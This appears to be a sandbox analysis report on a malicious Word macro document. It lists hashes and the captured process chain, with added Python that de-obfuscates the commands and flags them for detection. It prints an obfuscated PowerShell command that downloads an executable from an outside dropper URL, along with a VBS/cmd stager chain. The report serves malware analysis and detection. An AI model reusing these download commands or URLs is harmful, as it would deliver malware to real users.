Analysis

  • max time kernel
    66s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 03:39

General

  • Target

    2020_1844777494.docm

  • Size

    380KB

  • MD5

    bbea719b296b81cb70e294246c9d6eae

  • SHA1

    d79c7c9a0ddc7d3c7d90eb90f47783e999bb7ebd

  • SHA256

    99d22eb3d584f502292d847497713c8db10f7aa9d2b08f5f6da8e690be4f7832

  • SHA512

    40d7d306bfc8fad85f82d7f3fe9b5baec403a953178bf8284043afcb136b2356084151ded8f1e5c75aaa480e30a2aad0235adea09fdf4fffb7341d5890c67d17

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://werfpop.nl/client.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020_1844777494.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\Portes.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1220
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Game_Lods\Groters.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Windows\system32\taskkill.exe
          Taskkill /IM "winword.exe" /F
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1632
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://werfpop.nl/client.exe', 'C:\Game_Lods\Kritos.exe')
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:2016
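The chain shown above (Word handing Portes.vbs to explorer.exe, WScript running Groters.cmd through cmd.exe, and cmd.exe in turn launching taskkill, a quote-split PowerShell download, and a timeout) together with the deobfuscated dropper URL listed under Malware Config can be reproduced with the following Python. It is an added example, not part of the sandbox report: it transcribes the process tree from this page (parent PIDs are inferred from the tree nesting, which the report only shows as indentation), strips the quote-splitting to recover the PowerShell line that actually executed, pulls the URL and drop path out of it, and flags the parent/child relationships a detection engineer would alert on. The rule names and the Office/script-host lists are the example's own assumptions.

```python
import re

# Process tree transcribed from the sandbox report above as (pid, ppid, image, command line).
# The report lists PIDs only; parent PIDs here are inferred from its tree indentation.
PROCESSES = [
    (2008, None, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
     r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020_1844777494.docm"'),
    (1220, 2008, r"C:\Windows\SysWOW64\explorer.exe", r"explorer.exe C:\ProgramData\Portes.vbs"),
    (1784, None, r"C:\Windows\explorer.exe",
     r"C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"),
    (580, 1784, r"C:\Windows\System32\WScript.exe", r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"'),
    (1396, 580, r"C:\Windows\System32\cmd.exe", r'cmd /c ""C:\Game_Lods\Groters.cmd" "'),
    (1632, 1396, r"C:\Windows\system32\taskkill.exe", r'Taskkill /IM "winword.exe" /F'),
    (1896, 1396, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://werfpop.nl/client.exe', 'C:\Game_Lods\Kritos.exe')'''),
    (2016, 1396, r"C:\Windows\system32\timeout.exe", r"TIMEOUT /T 10"),
]
BY_PID = {p[0]: p for p in PROCESSES}

# Example's own lists (assumptions): Office parents and script hosts worth watching.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_CALL = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)


def image_name(path):
    """Lower-cased file name of an image path, so WScript.exe and wscript.exe compare equal."""
    return path.rsplit("\\", 1)[-1].lower()


def normalize_cmdline(cmdline):
    """Undo quote-splitting. Windows argument parsing removes the double quotes that
    delimit quoted runs, so "Ne"w-Object reaches PowerShell as New-Object; dropping
    every double quote and collapsing whitespace recovers the text that was run."""
    return re.sub(r"\s+", " ", cmdline.replace('"', "")).strip()


def extract_dropper(cmdline):
    """Return (url, destination path) from a WebClient.DownloadFile call, or None."""
    m = DOWNLOAD_CALL.search(normalize_cmdline(cmdline))
    return (m.group(1), m.group(2)) if m else None


def chain(pid):
    """Image names from the root of the tree down to pid."""
    names = []
    while pid is not None:
        _, ppid, image, _ = BY_PID[pid]
        names.append(image_name(image))
        pid = ppid
    return names[::-1]


def analyse(processes=PROCESSES):
    """Apply parent/child and command-line rules; returns (pid, rule, detail) tuples."""
    by_pid = {p[0]: p for p in processes}
    findings = []
    for pid, ppid, image, cmd in processes:
        name = image_name(image)
        parent = image_name(by_pid[ppid][2]) if ppid in by_pid else None
        # Office should not be the parent of anything outside the Office suite.
        if parent in OFFICE and name not in OFFICE:
            findings.append((pid, "office_spawned_child", f"{parent} -> {name}"))
        # A script host handing off to cmd.exe is the VBS-to-batch stager seen here.
        if name == "cmd.exe" and parent in SCRIPT_HOSTS:
            findings.append((pid, "script_host_spawned_cmd", f"{parent} -> {name}"))
        # Match the download on the normalized line so quote-splitting cannot hide it.
        if name == "powershell.exe":
            drop = extract_dropper(cmd)
            if drop:
                findings.append((pid, "powershell_download", drop))
        # Killing Word removes the lure document once the stager is running.
        if name == "taskkill.exe" and "winword" in cmd.lower():
            findings.append((pid, "kills_office_lure", normalize_cmdline(cmd)))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in analyse():
        print(f"PID {pid:<5} {rule:<25} {detail}")
    print("download chain:", " -> ".join(chain(1896)))
```

The point of `normalize_cmdline` is that a rule matching the literal string `DownloadFile(` against raw process-creation telemetry misses this sample, because the command line on disk reads `"Dow"nloadFile"(`; the interpreter only sees the joined form after the argument parser drops the delimiting quotes. Normalizing before matching, and alerting on the Office-to-explorer and WScript-to-cmd edges regardless of command-line content, catches the chain even when the strings are varied.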

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    Modify Registry (T1112): 1
  • Discovery
    System Information Discovery (T1082): 1

Downloads

  • C:\Game_Lods\Groters.cmd
    Filesize

    4KB

    MD5

    0113834f9f390e12db3057891516f47d

    SHA1

    9c7e3a611586726c18f33ca668ce8c8e8ffc2919

    SHA256

    6231b5b04cb2708b8b8446536de8df99391da90bc77449589ab0e5b7660738e6

    SHA512

    0cd634772edb38f33222bc8654257f0959a063fcf5f8cea59d10a4b106746855dfcb974420e3729088e082d71f57e712a17b599ca69b06a0674b531358769fef

  • C:\ProgramData\Nolewr.vbs
    Filesize

    358B

    MD5

    c16098d503816c750a2b4ce0b179798f

    SHA1

    e0a6368150f802e5ece6558b2693fa4ca8eeb4b8

    SHA256

    8ba6c20c21eb3a74998f53f1f7d8aa1a139a98c7413ce7bcb3052280f75b3f7d

    SHA512

    e3ca2ce1cc04b37b861489dd1fd21575efe261b436bb29eeed8653f0b5558ac902c8c0f7596bbae91b28854946597da5b385d0614edbf1e8755b955bed698929

  • C:\ProgramData\Portes.vbs
    Filesize

    68KB

    MD5

    633d05bd06f41c9aa4281baa46ce38e4

    SHA1

    056a5a05108edbedde196098e07553c5c201368f

    SHA256

    a478b1ba294dee526fdf1986402d5e387151394525cc5f523026183197672a77

    SHA512

    268f61d20235696295481651ce70c20164ce4a16f6b6ae4b3e14d86f9e2743904db19e05810991f5928e3e82b08a11a9355a18d711309e1eef118047467a3c7a

  • memory/580-64-0x0000000000000000-mapping.dmp
  • memory/1220-59-0x0000000000000000-mapping.dmp
  • memory/1220-61-0x000000006B491000-0x000000006B493000-memory.dmp
    Filesize

    8KB

  • memory/1396-67-0x0000000000000000-mapping.dmp
  • memory/1632-69-0x0000000000000000-mapping.dmp
  • memory/1784-62-0x000007FEFC331000-0x000007FEFC333000-memory.dmp
    Filesize

    8KB

  • memory/1896-72-0x000007FEF45D0000-0x000007FEF4FF3000-memory.dmp
    Filesize

    10.1MB

  • memory/1896-70-0x0000000000000000-mapping.dmp
  • memory/1896-73-0x000007FEF3A70000-0x000007FEF45CD000-memory.dmp
    Filesize

    11.4MB

  • memory/1896-74-0x0000000002914000-0x0000000002917000-memory.dmp
    Filesize

    12KB

  • memory/1896-75-0x000000001B840000-0x000000001BB3F000-memory.dmp
    Filesize

    3.0MB

  • memory/1896-76-0x000000000291B000-0x000000000293A000-memory.dmp
    Filesize

    124KB

  • memory/2008-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2008-58-0x00000000716ED000-0x00000000716F8000-memory.dmp
    Filesize

    44KB

  • memory/2008-57-0x0000000075DB1000-0x0000000075DB3000-memory.dmp
    Filesize

    8KB

  • memory/2008-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2008-54-0x0000000072C81000-0x0000000072C84000-memory.dmp
    Filesize

    12KB

  • memory/2008-55-0x0000000070701000-0x0000000070703000-memory.dmp
    Filesize

    8KB

  • memory/2016-77-0x0000000000000000-mapping.dmp